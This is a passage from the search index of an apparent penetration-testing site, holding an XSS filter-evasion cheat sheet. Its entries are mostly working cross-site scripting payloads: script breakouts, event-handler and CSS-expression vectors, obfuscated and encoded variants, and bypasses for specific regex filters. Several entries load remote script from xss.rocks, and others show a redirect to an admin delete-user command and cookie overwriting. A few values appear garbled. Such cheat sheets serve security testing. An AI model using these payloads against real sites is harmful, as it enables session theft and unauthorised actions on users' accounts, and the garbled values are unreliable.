and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a=\"\\\\\\\\\";alert('XSS');//\";</SCRIPT>
which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:
`\\\";alert('XSS');//`\n
An alternative, if correct JSON or Javascript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own:
</script><script>alert('XSS');</script>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#end-title-tag", "title": "End Title Tag", "text": "This is a simple XSS vector that closes <TITLE>
tags, which can encapsulate the malicious cross site scripting attack:
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#input-image", "title": "INPUT Image", "text": "<input type=\"IMAGE\" src=\"javascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#body-image", "title": "BODY Image", "text": "<body background=\"javascript:alert('XSS')\"></body>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-dynsrc", "title": "IMG Dynsrc", "text": "<img DYNSRC=\"javascript:alert('XSS')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-lowsrc", "title": "IMG Lowsrc", "text": "<img LOWSRC=\"javascript:alert('XSS')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#list-style-image", "title": "List-style-image", "text": "Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#vbscript-in-an-image", "title": "VBscript in an Image", "text": "<img src='vbscript:msgbox(\"XSS\")' />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#livescript-older-versions-of-netscape-only", "title": "Livescript (older versions of Netscape only)", "text": "<img src=\"livescript:[code]\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#svg-object-tag", "title": "SVG Object Tag", "text": "<svg/onload=alert('XSS')>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#ecmascript-6", "title": "ECMAScript 6", "text": "Set.constructor`alert\\x28document.domain\\x29\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#body-tag", "title": "BODY Tag", "text": "Method doesn't require using any variants of javascript:
or <SCRIPT...
to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign (onload=
!= onload =
):
<BODY ONLOAD=alert('XSS')>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#event-handlers", "title": "Event Handlers", "text": "It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.
FSCommand()
(attacker can use this when executed from within an embedded Flash object) onAbort()
(when user aborts the loading of an image) onActivate()
(when object is set as the active element) onAfterPrint()
(activates after user prints or previews print job) onAfterUpdate()
(activates on data object after updating data in the source object) onBeforeActivate()
(fires before the object is set as the active element) onBeforeCopy()
(attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand(\"Copy\")
function) onBeforeCut()
(attacker executes the attack string right before a selection is cut) onBeforeDeactivate()
(fires right after the activeElement is changed from the current object) onBeforeEditFocus()
(Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) onBeforePaste()
(user needs to be tricked into pasting or be forced into it using the execCommand(\"Paste\")
function) onBeforePrint()
(user would need to be tricked into printing or attacker could use the print()
or execCommand(\"Print\")
function). onBeforeUnload()
(user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) onBeforeUpdate()
(activates on data object before updating data in the source object) onBegin()
(the onbegin event fires immediately when the element's timeline begins) onBlur()
(in the case where another popup is loaded and window loses focus) onBounce()
(fires when the behavior property of the marquee object is set to \"alternate\" and the contents of the marquee reach one side of the window) onCellChange()
(fires when data changes in the data provider) onChange()
(select, text, or TEXTAREA field loses focus and its value has been modified) onClick()
(someone clicks on a form) onContextMenu()
(user would need to right click on attack area) onControlSelect()
(fires when the user is about to make a control selection of the object) onCopy()
(user needs to copy something or it can be exploited using the execCommand(\"Copy\")
command) onCut()
(user needs to copy something or it can be exploited using the execCommand(\"Cut\")
command) onDataAvailable()
(user would need to change data in an element, or attacker could perform the same function) onDataSetChanged()
(fires when the data set exposed by a data source object changes) onDataSetComplete()
(fires to indicate that all data is available from the data source object) onDblClick()
(user double-clicks a form element or a link) onDeactivate()
(fires when the activeElement is changed from the current object to another object in the parent document) onDrag()
(requires that the user drags an object) onDragEnd()
(requires that the user drags an object) onDragLeave()
(requires that the user drags an object off a valid location) onDragEnter()
(requires that the user drags an object into a valid location) onDragOver()
(requires that the user drags an object into a valid location) onDragDrop()
(user drops an object (e.g. file) onto the browser window) onDragStart()
(occurs when user starts drag operation) onDrop()
(user drops an object (e.g. file) onto the browser window) onEnd()
(the onEnd event fires when the timeline ends. onError()
(loading of a document or image causes an error) onErrorUpdate()
(fires on a databound object when an error occurs while updating the associated data in the data source object) onFilterChange()
(fires when a visual filter completes state change) onFinish()
(attacker can create the exploit when marquee is finished looping) onFocus()
(attacker executes the attack string when the window gets focus) onFocusIn()
(attacker executes the attack string when window gets focus) onFocusOut()
(attacker executes the attack string when window loses focus) onHashChange()
(fires when the fragment identifier part of the document's current address changed) onHelp()
(attacker executes the attack string when users hits F1 while the window is in focus) onInput()
(the text content of an element is changed through the user interface) onKeyDown()
(user depresses a key) onKeyPress()
(user presses or holds down a key) onKeyUp()
(user releases a key) onLayoutComplete()
(user would have to print or print preview) onLoad()
(attacker executes the attack string after the window loads) onLoseCapture()
(can be exploited by the releaseCapture()
method) onMediaComplete()
(When a streaming media file is used, this event could fire before the file starts playing) onMediaError()
(User opens a page in the browser that contains a media file, and the event fires when there is a problem) onMessage()
(fire when the document received a message) onMouseDown()
(the attacker would need to get the user to click on an image) onMouseEnter()
(cursor moves over an object or area) onMouseLeave()
(the attacker would need to get the user to mouse over an image or table and then off again) onMouseMove()
(the attacker would need to get the user to mouse over an image or table) onMouseOut()
(the attacker would need to get the user to mouse over an image or table and then off again) onMouseOver()
(cursor moves over an object or area) onMouseUp()
(the attacker would need to get the user to click on an image) onMouseWheel()
(the attacker would need to get the user to use their mouse wheel) onMove()
(user or attacker would move the page) onMoveEnd()
(user or attacker would move the page) onMoveStart()
(user or attacker would move the page) onOffline()
(occurs if the browser is working in online mode and it starts to work offline) onOnline()
(occurs if the browser is working in offline mode and it starts to work online) onOutOfSync()
(interrupt the element's ability to play its media as defined by the timeline) onPaste()
(user would need to paste or attacker could use the execCommand(\"Paste\")
function) onPause()
(the onpause event fires on every element that is active when the timeline pauses, including the body element) onPopState()
(fires when user navigated the session history) onProgress()
(attacker would use this as a flash movie was loading) onPropertyChange()
(user or attacker would need to change an element property) onReadyStateChange()
(user or attacker would need to change an element property) onRedo()
(user went forward in undo transaction history) onRepeat()
(the event fires once for each repetition of the timeline, excluding the first full cycle) onReset()
(user or attacker resets a form) onResize()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResizeEnd()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResizeStart()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResume()
(the onresume event fires on every element that becomes active when the timeline resumes, including the body element) onReverse()
(if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward) onRowsEnter()
(user or attacker would need to change a row in a data source) onRowExit()
(user or attacker would need to change a row in a data source) onRowDelete()
(user or attacker would need to delete a row in a data source) onRowInserted()
(user or attacker would need to insert a row in a data source) onScroll()
(user would need to scroll, or attacker could use the scrollBy()
function) onSeek()
(the onreverse event fires when the timeline is set to play in any direction other than forward) onSelect()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");
) onSelectionChange()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");
) onSelectStart()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");
) onStart()
(fires at the beginning of each marquee loop) onStop()
(user would need to press the stop button or leave the webpage) onStorage()
(storage area changed) onSyncRestored()
(user interrupts the element's ability to play its media as defined by the timeline to fire) onSubmit()
(requires attacker or user submits a form) onTimeError()
(user or attacker sets a time property, such as dur, to an invalid value) onTrackChange()
(user or attacker changes track in a playList) onUndo()
(user went backward in undo transaction history) onUnload()
(as the user clicks any link or presses the back button or attacker forces a click) onURLFlip()
(this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) seekSegmentTime()
(this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.) ", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#bgsound", "title": "BGSOUND", "text": "<bgsound SRC=\"javascript:alert('XSS');\"></bgsound>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#javascript-includes", "title": "& JavaScript includes", "text": "<br SIZE=\"&{alert('XSS')}\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-sheet", "title": "STYLE sheet", "text": "<link rel=\"stylesheet\" href=\"javascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#remote-style-sheet", "title": "Remote style sheet", "text": "Using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression. This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
<link rel=\"stylesheet\" href=\"http://xss.rocks/xss.css\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#remote-style-sheet-part-2", "title": "Remote style sheet part 2", "text": "This works the same as above, but uses a <STYLE>
tag instead of a <LINK>
tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE>
tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
<style>\n@import 'http://xss.rocks/xss.css';\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#remote-style-sheet-part-3", "title": "Remote style sheet part 3", "text": "This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://xss.rocks/xss.css>; REL=stylesheet
) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:
<meta http-equiv=\"Link\" content=\"<http://xss.rocks/xss.css>; REL=stylesheet\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#remote-style-sheet-part-4", "title": "Remote style sheet part 4", "text": "This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:
<style>\nBODY {\n-moz-binding: url('http://xss.rocks/xssmoz.xml#xss');\n}\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-tags-with-broken-up-javascript-for-xss", "title": "STYLE Tags with Broken-up JavaScript for XSS", "text": "This XSS at times sends IE into an infinite loop of alerts:
<style>\n@im \\port'\\ja\\vasc\\ript:alert(\"XSS\")';\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-attribute-using-a-comment-to-break-up-expression", "title": "STYLE Attribute using a Comment to Break-up Expression", "text": "Created by Roman Ivanov
<img style=\"xss:expr/*XSS*/ession(alert('XSS'))\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-style-with-expression", "title": "IMG STYLE with Expression", "text": "This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:
exp/*<a\n style='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'\n></a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-tag-older-versions-of-netscape-only", "title": "STYLE Tag (Older versions of Netscape only)", "text": "<style type=\"text/javascript\">\nalert('XSS');\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-tag-using-background-image", "title": "STYLE Tag using Background-image", "text": "<style>\n.XSS {\nbackground-image: url(\"javascript:alert('XSS')\");\n}</style\n><a class=\"XSS\"></a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-tag-using-background", "title": "STYLE Tag using Background", "text": "<style type=\"text/css\">\nBODY {\nbackground: url(\"javascript:alert('XSS')\");\n}</style\n>` `<style type=\"text/css\">\nBODY {\nbackground: url(\"<javascript:alert>('XSS')\");\n}\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#anonymous-html-with-style-attribute", "title": "Anonymous HTML with STYLE Attribute", "text": "IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:
<XSS STYLE=\"xss:expression(alert('XSS'))\"></XSS>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#local-htc-file", "title": "Local htc File", "text": "This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:
<XSS STYLE=\"behavior: url(xss.htc);\"></XSS>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#us-ascii-encoding", "title": "US-ASCII Encoding", "text": "US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.
`\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#meta", "title": "META", "text": "The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:
<meta http-equiv=\"refresh\" content=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#iframe", "title": "IFRAME", "text": "If iframes are allowed there are a lot of other XSS problems as well:
<iframe src=\"javascript:alert('XSS');\"></iframe>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#iframe-event-based", "title": "IFRAME Event Based", "text": "IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)
<iframe src=\"#\" onmouseover=\"alert(document.cookie)\"></iframe>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#frame", "title": "FRAME", "text": "Frames have the same sorts of XSS problems as iframes
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#table", "title": "TABLE", "text": "<table BACKGROUND=\"javascript:alert('XSS')\"></table>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#td", "title": "TD", "text": "Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
<table>\n <td BACKGROUND=\"javascript:alert('XSS')\"></td>\n</table>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div", "title": "DIV", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div-background-image", "title": "DIV Background-image", "text": "<div style=\"background-image: url(javascript:alert('XSS'))\"></div>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div-background-image-with-unicoded-xss-exploit", "title": "DIV Background-image with Unicoded XSS Exploit", "text": "This has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
<div\n style=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\"\n></div>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div-background-image-plus-extra-characters", "title": "DIV Background-image Plus Extra Characters", "text": "Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):
<div style=\"background-image: url(javascript:alert('XSS'))\"></div>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div-expression", "title": "DIV Expression", "text": "A variant of this was effective against a real world cross site scripting filter using a newline between the colon and \"expression\":
<div style=\"width: expression(alert('XSS'));\"></div>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#downlevel-hidden-block", "title": "Downlevel-Hidden Block", "text": "Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:
<!--[if gte IE 4]>\n <script>\n alert('XSS');\n </script>\n<![endif]-->\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#base-tag", "title": "BASE Tag", "text": "Works in IE and Netscape 8.1 in safe mode. You need the //
to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like images/image.jpg
rather than full paths. If the path includes a leading forward slash like /images/image.jpg
you can remove one slash from this vector (as long as there are two to begin the comment this will work):
<base href=\"javascript:alert('XSS');//\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#object-tag", "title": "OBJECT Tag", "text": "If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:
<object type=\"text/x-scriptlet\" data=\"http://xss.rocks/scriptlet.html\"></object>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embed-svg-which-contains-xss-vector", "title": "EMBED SVG Which Contains XSS Vector", "text": "This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#using-actionscript-inside-flash-for-obfuscation", "title": "Using ActionScript Inside Flash for Obfuscation", "text": "a = 'get';\nb = 'URL(\"';\nc = 'javascript:';\nd = \"alert('XSS');\\\")\";\neval(a + b + c + d);\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#xml-data-island-with-cdata-obfuscation", "title": "XML Data Island with CDATA Obfuscation", "text": "This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>\n<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#locally-hosted-xml-with-embedded-javascript-that-is-generated-using-an-xml-data-island", "title": "Locally hosted XML with embedded JavaScript that is generated using an XML data island", "text": "This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:
<XML SRC=\"xsstest.xml\" ID=I></XML>\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#htmltime-in-xml", "title": "HTML+TIME in XML", "text": "This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:
<html>\n <body>\n <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">\n <?import namespace=\"t\" implementation=\"#default#time2\">\n <t:set attributeName=\"innerHTML\" to=\"XSS\n <script defer>\n alert('XSS');\n </script>\n \">\n </body>\n</html>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#assuming-you-can-only-fit-in-a-few-characters-and-it-filters-against-js", "title": "Assuming you can only fit in a few characters and it filters against .js
", "text": "You can rename your JavaScript file to an image as an XSS vector:
<script src=\"http://xss.rocks/xss.jpg\"></script>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#ssi-server-side-includes", "title": "SSI (Server Side Includes)", "text": "This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'\"-->\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#php", "title": "PHP", "text": "Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:
<? echo('<SCR)';\necho('IPT>alert(\"XSS\")</SCRIPT>'); ?>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-embedded-commands", "title": "IMG Embedded Commands", "text": "This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:
<img src=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-embedded-commands-part-ii", "title": "IMG Embedded Commands part II", "text": "This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=\"httx://badguy.com/a.jpg\">
could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#cookie-manipulation", "title": "Cookie Manipulation", "text": "Admittedly this is pretty obscure but I have seen a few examples where <META
is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):
<meta http-equiv=\"Set-Cookie\" content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#utf-7-encoding", "title": "UTF-7 Encoding", "text": "If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:
<head>\n <meta http-equiv=\"CONTENT-TYPE\" content=\"text/html; charset=UTF-7\" /></head\n>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#xss-using-html-quote-encapsulation", "title": "XSS Using HTML Quote Encapsulation", "text": "This was tested in IE, your mileage may vary. For performing XSS on sites that allow <SCRIPT>
but don't allow <SCRIPT SRC...
by way of a regex filter /\\<script\\[^\\>\\]+src/i
:
<script a=\">\" src=\"httx://xss.rocks/xss.js\"></script>\n
For performing XSS on sites that allow <SCRIPT>
but don't allow \\<script src...
by way of a regex filter /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i
(this is an important one, because I've seen this regex in the wild):
<script =\">\" src=\"httx://xss.rocks/xss.js\"></script>\n
Another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i
:
<SCRIPT a=\">\" '' SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>\n
Yet another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i
. I know I said I wasn't going to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT>
tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT>
tags):
<SCRIPT \"a='>'\" SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>\n
And one last XSS attack to evade, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i
using grave accents (again, doesn't work in Firefox):
<script a=\"`\">\n` SRC=\"httx://xss.rocks/xss.js\">\n</script>\n
Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:
<script a=\">'>\" src=\"httx://xss.rocks/xss.js\"></script>\n
This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>\n
